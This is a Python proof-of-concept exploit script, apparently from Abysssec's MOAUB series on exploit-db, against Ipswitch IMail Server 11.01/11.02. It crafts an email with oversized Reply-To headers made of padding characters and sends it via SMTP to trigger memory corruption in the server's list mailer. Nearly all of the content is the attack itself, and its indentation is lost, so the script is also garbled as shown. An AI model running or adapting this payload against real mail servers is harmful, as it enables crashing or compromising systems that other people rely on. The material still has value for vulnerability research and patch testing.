'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ <
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/
http://www.exploit-db.com/moaub-15-ipswitch-imail-server-list-mailer-reply-to-address-memory-corruption/
'''
'''
Title : Ipswitch Imail Server List Mailer Reply-To Address memory corruption
Version : Imail server v11.01 and 11.02
Analysis : http://www.abysssec.com
Vendor : http://www.ipswitch.com
Impact : Critical
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
'''
import smtplib
sender = 'from@fromdomain.com'
receivers = ['CrashList@wapteam-f556693']
message = """From: From Person <from@fromdomain.com>
To: To Person <CrashList@wapteam-f556693>
"""
#ReplayCount = 5
#while ReplayCount>0:
# message = message + "Reply-To:"
counter = 3
while counter>0:
# if counter != 50000 :
# message = message + ","
#message = message + "Reply-To: <someone"+str(counter)+"@example.org>"
message = message + "Reply-To: "+("A"*200)+"a"*4+"B"*196+"@exam.com"
counter = counter - 1
message = message + "\n"
# ReplayCount = ReplayCount - 1
#message = message + "\n"
message = message + """
Subject: SMTP e-mail test
This is a test e-mail message.
"""
#print message
#fp = open("C:\\Program Files\\Ipswitch\\IMail\\spool\\tmp188.tmp","w")
#fp.write(message)
#fp.close()
#print "wrote"
try:
smtpObj = smtplib.SMTP('localhost')
smtpObj.sendmail(sender, receivers, message)
print "Successfully sent email"
except SMTPException:
print "Error: unable to send email"
